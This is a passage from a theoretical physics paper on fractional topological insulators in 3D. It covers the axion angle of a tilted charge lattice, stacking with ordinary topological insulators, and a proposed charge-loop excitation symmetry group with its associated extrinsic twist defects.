\[figure\_theta\](a)). To illustrate, the red dashed line in Fig. \[figure\_theta\](b) can be either more or less tilted with respect to the vertical axis via a shear deformation. The charge lattice \[Fig. \[figure\_theta\](b)\] with a nonzero $\Theta$ can be obtained through such a shear deformation from the non-tilted charge lattice \[Fig. \[figure\_theta\](a)\]. Since $\Theta=\frac{1}{9}\pi$, the charge lattice shown in Fig. \[figure\_theta\](b) is time-reversal invariant ($Q\rightarrow Q, M\rightarrow -M, \Gamma\rightarrow \Gamma+\text{even integer}$), which can be viewed as a reflection symmetry about $Q$-axis. It is obvious that the entire charge lattice \[Fig. \[figure\_theta\](b)\] as well as the self-statistics distribution is unaltered if we further increase $\Theta$ by $\frac{2}{9}\pi$ (i.e. increase $\tan\alpha$ by $1/9$). For this reason, $\Theta$ is well defined only mod $\frac{2}{9}\pi$ as shown in Eq. (\[eqn:new\_Theta\_reduced\]). For example, the bosons on the site $(\frac{1}{6},3)$ are shifted to the bosons on the site $(\frac{1}{2},3)$; the fermions on the site $(0, 6)$ are shifted to the fermions on the site $(\frac{2}{3},6)$. Furthermore, since the charge lattice is actually 4-dimensional (Definition \[dfn\_excitation\]), each lattice site of Fig. \[figure\_theta\]-(b) actually corresponds to many excitations that are different from each other by $N^a_m,N^b_m$ as shown in Fig. \[figure\_theta\]-(c) where $Q=\frac{1}{6},M=3$ is illustrated. The lattice sites in Fig. \[figure\_theta\]-(c) follow a simple relation: $({N^b_m-N^a_m-1})/{3}\in\Z$ where $N^a_m,N^b_m$ are even. (see Appendix \[appendix\_gamma\_stat4321\_new\] for details.) ![(Color online) Self-statistics distribution on the 4D charge lattice. (a) Self-statistics distribution as a function of $M$ and $Q$ by turning off $\Theta$ in Eq. (\[eq:stat4321\_new\]). (b) Self-statistics distribution as a function of $M$ and $Q$ as shown in Eq. (\[eq:stat4321\_new\]). The allowed values of $M$ and $Q$ are determined by Eqs. (\[Q\_fractional\_M0\],\[Q\_fractional\_M1\]). Geometrically, $\Theta=2\pi\tan\alpha$, where $\tan\alpha=\frac{1/6}{3}=1/18$. Thus, $\Theta$ angle can be viewed as a consequence of a shear deformation from (a) to (b). During the shear deformation, the area of “Dirac unit cell” (denoted by the shaded area) is invariant. Since the charge lattice is 4D (Definition \[dfn\_excitation\]), each site in (b) on the $(M-Q)$ parameter space corresponds to more than one excitation. An example is shown in (c), where $N^a_m,N_m^b$ are used to [label]{} excitations that have the same $Q$ and $M$: $Q=\frac{1}{6},M=3$.[]{data-label="figure_theta"}](figure_theta.pdf){width="8.5cm"} Experimentally, one may understand the physics of $\Theta$ via the surface quantum Hall effect on a surface with broken time-reversal symmetry. For example, by placing a ferromagnetic thin film on top of the surface of [a]{} [FTI]{}, we may observe [a]{} Hall effect with Hall conductance $\sigma_H=\frac{\Theta}{2\pi}\frac{e^2}{h}$ [@Qi2008]: $$\begin{aligned} \sigma_H=\left(\frac{1}{18}+\frac{n}{9}\right)\frac{e^2}{h}\,,n\in\Z\,,\end{aligned}$$ where $h$ is the usual Planck constant. It should be kept in mind that, although the minimal nonzero $\sigma_H$ is $\frac{1}{18}$, the corresponding charge induced by the Hall response is not $\frac{1}{18}$ since the quantization of $M$ in Eq. (\[double\_m\_charge\]) is modified from its non-fractionalized value. More precisely, an external EM monopole with $M$ magnetic charge can be viewed as $2\pi M$ EM magnetic fluxes threading the surface [@bti5]. By using [the]{} Laughlin argument, the surface will generate $\frac{1}{18}M$ response charge once the EM monopole penetrates the surface. Since the minimal nonzero $M$ is $3$ due to Eq. (\[double\_m\_charge\]), the minimal surface response charge is $\frac{1}{18}\times 3=\frac{1}{6}$ rather than $1/18$. Further, the $\frac{1}{6}$ charge will be attached onto the EM magnetic monopole that moves into the [FTI]{} bulk, which renders the Witten effect [@witten1; @Qi2008; @franz]. This phenomenon is nontrivial in a sense that the $\frac{1}{6}$ charge cannot be formed by the bulk intrinsic excitations (Definition \[dfn\_intrinsic\_exc\]) whose $Q$ is quantized at $\frac{1}{3}$ due to Eq. (\[Q\_fractional\_M0\]). [An]{} [FTI]{} can be viewed as a symmetry-enriched topological phase [(SET)]{} which [is]{} characterized by both bulk topological order (TO) data and a symmetry action. In our case, the latter is encoded by the structure of the charge lattice in Fig. \[figure\_theta\]. The former is given by [the set of]{} all intrinsic excitations (Definition \[dfn\_intrinsic\_exc\], i.e., all sites along the $Q$-axis in Fig. \[figure\_theta\]) and also loop excitations (Definition \[dfn\_loops\]). With these preliminaries, we may discuss the consequence of stacking operations in the context of topological order [@string8; @wen_stacking]. [Stacking operations]{}, denoted as $\boxtimes$, form a monoid that does not contain inverse elements. It is known that stacking two TIs leads to [the topologically trivial vacuum state]{}: $\text{TI}\boxtimes \text{TI}=\text{Vacuum} $. Let us stack a 3D TI and a 3D [FTI]{} together. The [resulting]{} phase is a TO: $\text{FTI}\boxtimes \text{TI}=\text{TO} $. In other words, the stacking operation removes the nontrivial Witten effect of the [FTI]{}, rendering a [state with]{} pure topological order. This can be understood [in]{} two steps. First, since the bulk intrinsic excitations of a TI only contain electron excitations, the above stacking operation indeed does not change the TO of the [FTI]{}. Second, in the stacked phase, the net EM electric charge $Q$ is given by $Q=\left(\frac{\pi}{18}M+\frac{n}{3}\right)+\left(\frac{\pi}{2}M+n'\right) $ [with $n,n'\in\Z$]{}, where the first term is given by [the]{} Witten effect of [the]{} [FTI]{} while the second term is given by [the]{} Witten effect of [the]{} TI. Since the stacked phase [is]{} formed by putting [the]{} [FTI]{} and TI in [the]{} same [spatial]{} 3D region, the quantization of $M$ in Eq. (\[double\_m\_charge\]) still holds in the stacked phase. As a result, [the electric charge]{} $Q$ [in]{} the stacked phase is given by: $Q=\frac{5}{9}M+\frac{n}{3}+n'$, where the $M$-induced charge $\frac{5}{9}M$ is quantized [to]{} $5/3$. This charge can be [completely]{} screened by $\frac{n}{3}+n'$, e.g.[,]{} $n=-2\,,\,n'=-1$. Thus, the charge lattice of the stacked phase is not tilted, meaning that $\Theta=0$. In summary, the stacking of a [FTI]{} and a TI leads to a [phase with]{} pure topological order where [the]{} Witten effect is absent. We may also consider stacking [two]{} [FTI]{}s: $ \text{FTI}\boxtimes \text{FTI}=\text{TO}\boxtimes \text{TO}$, which means that the stacked phase is a purely topologically ordered phase where the charge lattice is not tilted and the topological order is given by $\text{TO}\boxtimes \text{TO}$. Surely, this is just an example while [it]{} is possible that other examples of [FTI]{} may [produce different phases when]{} stacked together with TI or [with]{} themselves. [S]{}tacking operations in SET phases [generally]{} change TO to a new topological order denoted as “$\widetilde{\text{TO}}$”. For example, stacking two [FTI]{}s here gives rise to $\widetilde{\text{TO}}=\text{TO}\boxtimes \text{TO}$. In order to see if the [resulting]{} phase is a new SET or not, one should further consider symmetry-respecting condensations that change $\widetilde{\text{TO}}$ back to TO. [In]{} this way, we may make progress toward the classification of SETs. As it is beyond the scope of the present work, we will leave this issue to further studies. The above calculation is based on concrete numerical inputs (\[define\_KNq12345\]). As [mentioned previously]{}, one may in principle generically deduce $\Theta$ as a function of the parameters $(u,v,u',v',q,q',\theta)$ that fully determine the two permissible composite condensations and the [entire]{} bulk spectrum. In 2D, we know that some FQH states can be unified into Jain’s sequence [@composite_Jain_1; @composite_Jain_2] such that they can be understood in the composite-fermion theory with different microscopic designs of the composite particles. Our 3D composite particle theory is similar to this 2D scenario: the $\Theta$ angle, and other properties of composite condensation phases, are also determined by the different designs of composite condensations. Therefore, all phases constructed from composite condensations can be thought to form a sequence. We expect more studies in the future along this line of thinking will be helpful in uncovering the physics of 3D Abelian topological phases of strongly interacting fermion systems. Deconfined descrete gauge subgroup $\Z_2\times \Z_6$: Abelian topological order in the bulk {#sec_FTI_plus} ------------------------------------------------------------------------------------------- The FTI state obtained in Sec. \[sec\_FTI\] supports fractionalized intrinsic excitations as indicated by Eq. (\[Q\_fractional\_M0\]) and the texts around it. Ref.  ever pointed out that FTIs necessarily has a fractionalized bulk. Therefore, our construction is consistent to the claim. Usually, a fractionalized gapped bulk can be understood as the presence of a topological order of some form. To see more clearly the exact form of the topological order of our FTI, let us start with the $K$ matrix in Eq. (\[define\_KNq12345\]). By using two independent unimodular matrices (i.e., $\Omega$ and $W$ that will be discussed in details in Sec. \[sec:charlos\_defect\_symmetry\]), we may diagonalize $K$: $$\begin{aligned} & \Omega K W^T=\bpm 2 & 0 \\ 0& 6\epm, \\ &\text{where }\Omega=\bpm 1&0\\-2&1 \epm\,,\,W=\bpm 1&0\\-1&1 \epm\,.\end{aligned}$$ In the new basis, it is clear that the bosonic sectors of the ground state are described by deconfined $\Z_2\times\Z_6$ gauge group. In other words, the maximal torus $U(1)\times U(1)$ of the $SU(3)$ gauge group of the parton construction is confined *except* the $\Z_2\times\Z_6$ gauge subgroup. In Ref. , the discrete gauge group $\Z_2$ arises since the choice of parton mean-field Hamiltonian explicitly breaks the original pseudospin $SU(2)$ gauge group down to $\Z_2$ subgroup. However, in our FTI state, the discrete gauge subgroup arises from the the deconfined subgroup of a confined non-Abelian gauge group, physically due to the condensation of composites that contain magnetic monopoles. Charge-loop excitation symmetry and its relation to extrinsic twist defects {#sec:charlos_defect_symmetry} =========================================================================== In Sec. \[sec:theta\], we have explored the axion angle of the charge lattice with composite condensation. In this section, we will explore the charge-loop excitation symmetry based on the composite particle theory introduced in Sec. \[sec:gauge\_strc\]. The topological $BF$ field theory (\[BFaction\]), which is derived from the two permissible composite condensates, only captures the statistical interaction between particles that carry $N^a_m,N^b_m$ magnetic charges and loops that carry $\Phi_e^a,\Phi^b_e$ electric fluxes. Specifically, several important properties of composites, such as the self-statistics $\Gamma$ in Eq. (\[eq:quantum\_stat\]), and the net EM electric charge $Q$ in Eq. (\[NE1\]), are not encoded in Eq. (\[BFaction\]). However, the topological $BF$ field theory reproduces $Q_{\rm Debye}$, an important part of $Q$. In this section, we further study the topological $BF$ field theory and show that it serves as a useful platform to study “*Char*ge-*Lo*op *E*xcitation *S*ymmetry” (abbreviated as “$\mathsf{Charles}$”, see Definition \[dfn\_charlos\]) that can be viewed as a 3D generalization of “anyonic symmetry” [@Teo2015] (or “topological symmetry” in Ref.  and references therein) in 2D Abelian topological phases. We expect that 3D Abelian topological phases where loop excitations are allowed may host even more exotic physics if extrinsic twist defects are imposed, and anticipate that 3D charge-loop excitation symmetry will be a useful tool in future studies of such extrinsic defects. Definition of $\mathsf{Charles}$ {#sec:charlos} -------------------------------- In 2D topological phases, each point-like extrinsic twist defect is associated with an element of an anyonic symmetry group $G$. The anyonic symmetry group is a finite group that acts to permute a subset of anyons in the parent TO phase while preserving all of the topological properties (topological spin, statistics) of the anyons (and sometimes their symmetry properties as well, e.g., their EM charge). For example, the permutation of $e$ and $m$ particles in the 2D Wen-plaquette model (with $\Z_2$ TO)[@Wen2003] is a typical anyonic symmetry transformation. For this particular model this transformation can be realized by extrinsically imposing a lattice dislocation which enacts the permutation of $e$ and $m$ when an anyon passes through a 1D branch cut that terminates at the extrinsic point defect [@Kitaev2006; @Bombin2010; @You2012; @Teo2015]. Interestingly, this quasiparticle permutation mechanism endows the dislocation with an attached non-Abelian object at the defect core, which opens up a possible new platform for topological quantum computation. Mathematically speaking, the incorporation of extrinsic defects into 2D Abelian topological phases described by a category theory $\mathcal{C}$, promotes $\mathcal{C}$ to a $G$-crossed tensor category theory $\mathcal{C}^{\times}_{G}$ [@Barkeshli2014; @Teo2015]. Let us briefly recall some properties of anyonic symmetry in 2D Abelian topological phases. As mentioned, these phases are described using Abelian Chern-Simons theory using the data in a symmetric, integer $K$-matrix. There is an important class of unimodular, integer transformations $W$ satisfying $WKW^{T}=K$ that act as the automorphisms of $K$ (or the automorphisms of the integer lattice, and dual/quasiparticle lattice, determined by $K$). These transformations relabel the different anyonic excitations, but most of them preserve the anyon type, and just attach local quasiparticles (e.g., attaching extra electrons). These trivial transformations are called the inner automorphisms ${\mathsf{Inner}(K)}$ and they form a normal subgroup of the full set of automorphisms $\mathsf{Auto}(K).$ The non-trivial anyonic relabeling symmetries are hence given by the group $G\equiv\mathsf{Outer}(K)=\frac{\mathsf{Auto}(K)}{\mathsf{Inner}(K)}.$ This captures the conventional anyonic symmetries that act as point-group operations on the quasiparticle lattice, although it leaves out possible non-symmorphic lattice operations or symmetries of stably-equivalent $K$-matrices [@Teo2015; @Teo2014; @cano2013]. We will not consider these more complicated possibilities for anyonic symmetries any further and leave their 3D generalization to future work. In order to generalize this discussion of anyonic symmetry and extrinsic defects to 3D, let us revisit some basic facts of excitations in our 3D fermionic gapped phase formed by two permissible composite condensates. The 2D vectors $\mathbf{L}$ form a 2D loop-lattice in Definition \[dfn\_loops\]. The 2D vectors $\mathbf{N}_m$ form a 2D lattice which is a sublattice of the 4D charge lattice in Definition \[dfn\_excitation\]. As a whole, we may define a 6D *charge-loop-lattice* (N.B., this is not the same 6D lattice mentioned earlier). \[[Charge-loop-lattice]{}\] The charge-loop-lattice is a 6D lattice whose sites are given by the 6D lattice vector $\vec{V}=(N_A,\mathbf{N}^T_m,M,\mathbf{L}^T)=(N_A,N^a_m,N^b_m,M,\ell,\ell')$. Each site corresponds to a *charge-loop composite*.\[dfn\_cloop\] In order to avoid confusions in terminology, the word “composite,” if used by itself, always denotes a point-like particle, unless otherwise specified. The symmetry group $\mathsf{Charles}$ is then defined as below: \[[Charge-Loop Excitation Symmetry]{} ($\mathsf{Charles}$)\] The charge-loop excitation symmetry group is a subset of the point group of the 6D charge-loop-lattice and corresponds to the following quotient group: $$\begin{aligned} \mathsf{Charles}=\frac{\mathsf{Auto}(K)}{\mathsf{Inner}(K)}\,,\label{auto_inner}\end{aligned}$$ where $\mathsf{Auto}(K)$ is the group of generalized automorphisms of $K$. $\mathsf{Inner}(K)$ is the group of generalized inner automorphisms of $K$, which is a subgroup of $\mathsf{Auto}(K)$. Group elements of $\mathsf{Auto}(K)$ have the matrix representation $\mathscr{G}=W\oplus \Omega$, where the two independent rank-two unimodular matrices $W$ and $\Omega$ satisfy the following two conditions: $$\begin{aligned} &(i).~~~~ \Omega K W^T=K\,,\label{eqn:auto}\\ &(ii).~~~~\Gamma(\cdots, {\mathbf{N}_m},\cdots)=\Gamma (\cdots,W^{-1}\mathbf{N}_m,\cdots)\,.\label{eqn:auto1}\end{aligned}$$ Here, $\Gamma$ is the self-statistics of composites, which is a function of lattice sites labeled by the 4D coordinates ($N_A,\mathbf{N}^T_m,M$). In addition to conditions (i) and (ii), the group elements in $\mathsf{Inner}(K)$ have the property that $W^{-1}\mathbf{N}_m-\mathbf{N}_m=K^T\,(n_1,n_2)^T$ and $\Omega^{-1}\mathbf{L}-\mathbf{L}=K(n_3,n_4)^T$, where $n_1,\cdots,n_4$ are integers. $n_1$ and $n_2$ are functions of $\mathbf{N}_m,W$; $n_3$ and $n_4$ are functions of $\mathbf{L},\Omega$. \[dfn\_charlos\] Just like the 2D anyonic symmetry group, the definition of $\mathsf{Charles}$ also involves the definitions of $\mathsf{Auto}(K)$ and $\mathsf{Inner}(K)$. One can prove that $\mathsf{Auto}(K)$ satisfies the usual group axioms (identity element, inverse element, closure, associativity) and that $\mathsf{Inner}(K)$ is a normal subgroup of $\mathsf{Auto}(K)$, such that $\mathsf{Charles}$ forms a group. Details of this proof can be found in Appendix \[appendix\_proof\_group\]. Physically, group elements $\mathscr{G}=W\oplus\Omega$ in $\mathsf{Charles}$ correspond to point group transformations: $({\mathbf{N}_m})_{\text{new}} = W^{-1} \mathbf{N}_m, \,({\mathbf{L}})_{\text{new}} = \Omega^{-1}\mathbf{L}$. Conditions (i) and (ii) guarantee that the transformed charge-loop-lattice is identical to the original one, which means that $\mathsf{Charles}$ keeps not only the lattice geometry invariant, but also leaves all topological properties of particle excitations and loop excitations (denoted by lattice sites) unaffected. Those topological properties include the self-statistics of particle excitations $\Gamma$, the charge-loop braiding statistics $\vartheta^{cl}$, and the Debye screening $Q_{\rm Debye}$. However, there is a redundancy corresponding to $\mathsf{Inner}(K)$ that should be removed. $\mathsf{Inner}(K)$ includes all trivial transformations whose point-group effects are equivalent to effectively shifting both $\mathbf{N}_m$ and $\mathbf{L}$ by undetectable amounts (i.e., $\vartheta^{cl}=0 \text{ mod } 2\pi$ in Eq. (\[eq:cltheta\]); see also Sec. \[sec:loop\_loop\]), and thereby must be modded out from $\mathsf{Auto}(K)$ if we only want to keep non-trivial transformations. Again, the transformations in $\mathsf{Inner}(K)$ can be interpreted as changing the excitations by a trivial, topologically-undetectable charge or flux. In contrast to the 2D definition of “anyonic symmetry” where condition (i) (where the simpler structure only allows for $W=\Omega$) is enough to guarantee the invariance of the self-statistics of anyons, one now needs condition (ii) in order to guarantee that the self-statistics of excitations on the 4D charge lattice remains invariant under $\mathsf{Charles}$ transformations. The main reason for this is that the self-statistics of an excitation (Definition \[dfn\_excitation\]) cannot be captured by the topological $BF$ field theory. *Whether or not $W$ satisfies condition (ii) relies on the specifics of the parton decomposition, and in the following subsections, we will assume condition (ii) is satisfied.* General theory of $\mathsf{Charles}$ and its tensor-network-type representation {#sec:general_charlos} ------------------------------------------------------------------------------- It should be noted that $W$, $\Omega$, and $K$ in Definition \[dfn\_charlos\] can be naturally generalized to arbitrary rank if a physical realization using a scenario having any number of permissible composite condensates in Sec. \[sec:bec\] can be achieved. For example, one can consider a single composite condensate or three linearly independent condensates with entirely different parton constructions, which leads to a number $K\in\Z$ or a rank-three $K$ matrix respectively. Before proceeding further, we introduce a simplified notation that will be useful for subsequent discussions. The notation in the two-component $BF$ action (\[BFaction\]), such as $\tilde{a}$ and $\tilde{b}$, comes from the specific physical realization described in Sec. \[sec:bec\]. It is however inconvenient for the purpose of generalizing $\mathsf{Charles}$. Thus, in the current section (Sec. \[sec:general\_charlos\]), we temporarily use a new notation for the gauge fields: $b=(b^1,b^2,\cdots)$ and $a=(a^1,a^2,\cdots)$ where $b$ is a set of $2$-form Kalb-Ramond $U(1)$ gauge fields while $a$ is a set of $1$-form $U(1)$ gauge fields. As a result, the topological $BF$ term is expressed as: $$\begin{aligned} \frac{iK^{IJ}}{2\pi}\int b^{I}\wedge da^J=\frac{i}{2\pi}\int b^T\wedge K da \end{aligned}$$ with a square matrix $K$ of rank $N$. The excitation terms in Eq. (\[BFex\]) are rewritten as: $$\begin{aligned} \mathcal{S}_{ex}=i \int \mathbf{t}^T a\wedge \star j+i \int\mathbf{L}^T b \wedge \star \Sigma\,, \end{aligned}$$ where $\mathbf{t}=(t_1,t_2,\cdots)$ is an integer vector replacing the notation $\mathbf{N}_m$. Then, the charge-loop-lattice is formed by an $N$-dimensional charge lattice labeled by vectors $\mathbf{t}$ and an $N$-dimensional loop-lattice labeled by vectors $\mathbf{L}$. Group elements of $\mathsf{Charles}$ are still denoted as “$\mathscr{G}=W\oplus \Omega$” with the transformations: $(\mathbf{t})_{\text{new}} = W^{-1}\mathbf{t}$ and $(\mathbf{L})_{\text{new}} = \Omega^{-1}\mathbf{L}$. Let us consider some examples. In Table \[table:charlos\], all possible $\mathsf{Charles}$ groups are listed for a $1\times 1$ matrix $K\in\Z$. From the table, we see that $\mathbb{Z}_2$ gauge theory in (3+1)D $(K=2)$ only has trivial $\mathsf{Charles}$, which is surprisingly different from a deconfined $\mathbb{Z}_2$ gauge theory in (2+1)D (e.g., as appears in the Wen-plaquette model), where the $e\leftrightarrow m$ exchange process is an anyonic symmetry transformation. Nontrivial $\mathsf{Charles}$ arises for $\mathbb{Z}_K$ gauge theory in (3+1)D *only* when $|K|\geq 3$. For example, for $\mathbb{Z}_3$ gauge theory, the nontrivial element of $\mathsf{Charles}$ is $-\mathbb{I}\oplus-\mathbb{I}$ which means that $W=\Omega=-\mathbb{I}$ (here $\mathbb{I}$ reduces to the natural number “1”). Under the transformation of this group element, there is an exchange symmetry between a particle with one unit of gauge charge and a particle with two units of gauge charge since the latter is trivially equivalent to a particle with gauge charge $-1$. There is also an exchange symmetry between a loop with magnetic flux $2\pi/3$ and a loop with magnetic flux $4\pi/3$ ($=-\frac{2\pi}{3}+2\pi$). These two exchange processes must occur *simultaneously*. $K$ $\mathsf{Charles}$ ------------- ------------------------------------------------------------- $K=\pm 1$ $\{\mathscr{G}_{\mathbb{I}}\}$ $K=\pm 2$ $\{\mathscr{G}_{\mathbb{I}}\}$ $|K|\geq 3$ $\{\mathscr{G}_{\mathbb{I}},-\mathbb{I}\oplus-\mathbb{I}\}$ : Examples of $\mathsf{Charles}$ (Sec. \[sec:general\_charlos\]) when the matrix $K$ reduces to an integer. A generic group element is denoted by $\mathscr{G}=W\oplus \Omega$. $\mathscr{G}_{\mathbb{I}}$ denotes the identity element: $\mathscr{G}_{\mathbb{I}}=\mathbb{I}\oplus \mathbb{I}$. []{data-label="table:charlos"} A simple example of a rank-2 $K$ matrix is $K=2\sigma_x$. If we do not worry about $\mathsf{Charles}$ for a moment, a diagonalization can be achieved by using $W=\sigma_x, \Omega=\mathbb{I}_{2\times 2}$. In the new basis, we end up with two copies of the level-2 topological $BF$ field theory, thereby obtaining a $\mathbb{Z}_2\times\mathbb{Z}_2$ discrete gauge theory (i.e., $\mathbb{Z}_2\times\mathbb{Z}_2$ topological order). Due to Definition \[dfn\_charlos\], such a basis change is clearly not a group element of $\mathsf{Charles}$, but it reveals that the gauge structure is $\mathbb{Z}_2\times\mathbb{Z}_2$ rather than $\mathbb{Z}_4$. It is important to distinguish these possibilities since those two gauge structures produce the same ground state degeneracy ($\mathsf{GSD}$) on a 3-torus [@bf1; @bf2; @bf3; @horowitz89]. For this example, a typical group element of $\mathsf{Charles}$ is: $\mathscr{G}= \sigma_x\oplus \sigma_x$, which satisfies condition (i) in Eq. (\[eqn:auto\]). Physically, $\Omega$ exchanges a particle labeled by $\mathbf{t}=(0,1)^T$ and a particle labeled by $\mathbf{t}=(1,0)^T$. At the same time, $\Omega$ exchanges a loop labeled by $\mathbf{L}=(0,1)^T$ and a loop labeled by $\mathbf{L}=(1,0)^T$. For convenience, condition (i) in Eq. (\[eqn:auto\]) can be visually represented by a tensor network-type graph as shown in Fig. \[figure\_tensor\](a) of Appendix \[appendix\_proof\_group\]. It indicates that $K$ is a fixed point tensor (here, a matrix) that is invariant under $\mathsf{Charles}$ renormalization-group-like transformations. The bond dimension is given by the rank of $K$. This graphical representation allows us to straightforwardly generalize the notion of $\mathsf{Charles}$ to more general Abelian topological quantum field theories (TQFTs) in (3+1)D that include more exotic topological terms. For instance, let us consider a TQFT with the action: $$\begin{aligned} S=\frac{i}{2\pi}\int b^T\wedge K da+ i\int \Lambda^{IJK}a^I \wedge a^J \wedge da^K\,,\end{aligned}$$ where $\Lambda^{IJK}$ is a real tensor with three legs as shown in Fig. \[figure\_tensor\](b) of Appendix \[appendix\_proof\_group\]. By itself, and at a classical level, the second term in this action corresponds to a topological invariant for the mutual linkage of three electromagnetic flux loops [@bod]. At a quantum level, the action $S$ was also proposed as a continuum field theory description of Dijkgraaf-Witten lattice gauge theory [@dwitten; @corbodism3]. It can also be derived by gauging the global on-site symmetry group $G=\mathbb{Z}_{N_1}\times \mathbb{Z}_{N_2}\times \cdots$ of the TQFT action of a 3D SPT phase with $N_1\times N_2\times \cdots=|\text{det}K|$, where the quantization of $\Lambda^{IJK}$ is determined by the number of topologically distinct ways to impose $G$ in SPT phases [@YeGu2015]. The relation to 3-loop statistics [@wang_levin1; @levin_talk; @wang_levin2; @lin_levin] is being investigated [@YeGu2015; @wang_levin1; @levin_talk; @3loop_ryu]. It is believed that the coefficient $\Lambda^{IJK}$ encodes the information of $3$-loop statistics that classifies topologically distinct twisted discrete Abelian gauge field theories in (3+1)D. In analogy to the topological $BF$ field theory, the tensor $\Lambda^{IJK}$ must also be transformed accordingly under the charge-loop-lattice point group transformations. In order to keep the important 3-loop statistics data [@wang_levin1; @levin_talk] invariant, the generalized $\mathsf{Charles}$ should incorporate the following new condition: $$\begin{aligned} \sum_{I'J'K'}W^{I'I}W^{J'J}W^{K'K}\Lambda^{I'J'K'}=\Lambda^{IJK}\label{eqn:auto33}\end{aligned}$$ in addition to those conditions in Definition \[dfn\_charlos\]. Likewise, we can also use a tensor-network-type graph \[Fig. \[figure\_tensor\](b) of Appendix \[appendix\_proof\_group\]\], to graphically represent Eq. (\[eqn:auto33\]), where the bond dimension is no less than two. Finally, we can also consider a TQFT with the action: $$\begin{aligned} S=\frac{i}{2\pi}\!\int \!b^T\!\wedge K da+ i\!\!\int \!\Xi^{IJKL}a^I \wedge a^J \wedge a^K\wedge a^L, \end{aligned}$$ where the coefficient $\Xi^{IJKL}$ is a tensor with four legs. Likewise, the quantized values of $\Xi$ encode the information of the four-loop braiding process [@wang_levin2] and can provide topological invariants for classifying twisted discrete gauge field theories in (3+1)D. In order to keep $\Xi$ invariant under point-group transformations of the charge-loop-lattice, the following relation should be obeyed: $$\begin{aligned} \sum_{I'J'K'L'}\!W^{I'I}W^{J'J}W^{K'K}W^{L'L}\Xi^{I'J'K'L'}=\Xi^{IJKL}.\label{eqn:auto44}\end{aligned}$$ A tensor-network-type representation is shown in Fig. \[figure\_tensor\](c) of Appendix \[appendix\_proof\_group\], where the bond dimension is no less than four. We may also consider the scenario that $\mathsf{Charles}$ transformations can be performed *locally* so that $\mathsf{Charles}$ becomes dynamically *gauged*. In this case, the extrinsic twist defects become well-defined, deconfined excitations of a new topological phase. The resulting phases have been thoroughly studied in 2D and are non-Abelian topological phases called twist liquids [@Teo2015; @Teo2014; @ran; @barkeshli_wen; @Teo2013; @Barkeshli2014; @Bombin2010; @genon_1; @genon_2; @genon_3; @genon_4; @You2012]. As a result, $W$ and $\Omega$ become space-time dependent. The difference between the next-nearest lattice sites is compensated by locally twisting matter fields. The tensor-network graph representations of the various symmetry transformations in Fig. \[figure\_tensor\] of Appendix \[appendix\_proof\_group\] are suggestive that such a tensor-network analysis may be a useful tool for future studies of 3D twist liquids. ![(Color online) Extrinsic twist defects in 3D. (a) line defect; (b) point defect. The two cubic boxes denote the 3D bulk of an underlying quantum many-body system. The shaded plane in (a) denotes a 2D branch cut/plane ending at the line defect, while the dashed line in (b) denotes a 1D branch cut ending at the point defect. A line defect can act on both composite particles denoted by a black dot, and loops denoted by a red circle. Once a point-like excitation and a loop excitation move around a line defect, the defect performs the $\mathsf{Charles}$ symmetry transformation $\Omega$ and $W$ on the point-like excitation and the loop excitation, respectively. In (b), the loop moves around the point defect such that the branch line intersects at the loop’s spatial trajectory (a torus) only once. A $\mathsf{Charles}$ transformation induced by a point defect can only be $\mathscr{G}=W\oplus\Omega=\mathbb{I}\oplus\Omega$, which acts only on the loop excitations. However, due to Eq. (\[eqn:auto\]), the only candidate for $\Omega$ is $\mathbb{I}$. This means that point defects can only behave like the identity element $\mathscr{G}_{\mathbb{I}}$ of $\mathsf{Charles}$. Therefore, in 3D, we only consider line defects.[]{data-label="figure_defect"}](figure_defect.pdf){width="8.5cm"} Theory of $\mathsf{Charles}$-defects: twist defect species and fusion {#sec:defect_fusion} --------------------------------------------------------------------- ![image](figure_defect_composite.pdf){width="17.5cm"} In the following, we study extrinsic twist defects associated with $\mathsf{Charles}$ group elements in analogy to extrinsic twist defects in 2D Abelian topological phases with anyonic symmetry [@Teo2015; @Teo2014; @Teo2013; @Barkeshli2014; @genon_1; @genon_2; @Bombin2010; @You2012]. More specifically, we explore two issues: (i) the universal labeling of a defect in 3D, and (ii) the fusion properties of defect-charge-loop composites. Recently remarkable progress in the study of various aspects of string/loop excitations in (3+1)D topological phases of matter, such as their description using lattice models and field theories, their associated ground-state degeneracy ($\mathsf{GSD}$), and their braiding and fusion properties has been made[@string1; @string1.5; @wang_levin1; @string2; @string3; @string4; @ran; @string5; @string6; @string7; @string8; @string9; @string10]. As will be seen below, the consideration of extrinsic defects within the framework of charge-loop excitation symmetry introduces a new aspect to the physics of loop excitations in (3+1)D topological phases. We begin by reviewing the physics of twist defects and defect-anyon composites in 2D Abelian topological phases. From a topological point of view, externally imposed defects in such phases are a set of special, potentially non-Abelian objects. For Abelian groups, each group element of the anyonic symmetry group $G$ corresponds to a bare defect and there are $\mathsf{ord}(G)$ distinct bare defects, where $\mathsf{ord}(G)$ is the order of $G$. Generically, the defects are labeled by the conjugacy classes of $G,$ but since we only deal with Abelian groups here we will not often make this distinction. By a “bare” defect, we really mean that the defect is externally imposed alone in the bulk. In general, defects can be bound to anyons of the parent Abelian topological phase, thereby forming a *defect-anyon composite* which is, by definition, not bare. When given a group element of $G$, the total number of topologically distinct defects (also known as defect species) includes bare ones and composite ones, and is not always the same as the number of topologically distinct anyons. In other words, two defect-anyon composites might be topologically equivalent to each other if there do not exist gauge-invariant Wilson measurements that can distinguish them. Indeed, there is a consistency equation for determining the equivalence classes of defect types [@Teo2014; @Teo2015], $$\begin{aligned} \mathcal{D}^0_\mathscr{G} \times qp =\mathcal{D}^0_\mathscr{G}\times (qp+(\mathbb{I}-\mathscr{G})qp_1) \,,\label{equation_fusion_2d}\end{aligned}$$ which is diagrammatically shown in Fig. \[figure\_defect\_composite\](a). Here, $qp$ denotes a quasiparticle (i.e., an anyon) that is provided by the parent 2D Abelian topological phase. $\mathcal{D}^0_\mathscr{G}$ denotes a bare defect labeled by a group element $\mathscr{G}$ of the anyonic symmetry group $G$. The particle $qp_1$ is any anyon provided by the parent 2D Abelian topological phase. The composite object $ \mathcal{D}^0_{\mathscr{G}}\times qp$ denotes the fusion between $\mathcal{D}^0_{\mathscr{G}}$ and $qp$ that forms a defect-anyon composite. Specifically, Eq. (\[equation\_fusion\_2d\]) determines when this defect-anyon composite is topologically identical to a defect-anyon composite that is formed by the fusion between the same bare defect and a different anyon given by $qp+(\mathbb{I}-\mathscr{G})qp_1$. The symbol “$+$” should be regarded as the addition of quasiparticle vectors in the $K$-matrix Chern-Simons theory. The physical reason of this equivalence is really due to the nontrivial internal structure of a defect-anyon composite. More specifically, the anyon $qp$ that is trapped at the defect can emit anyon 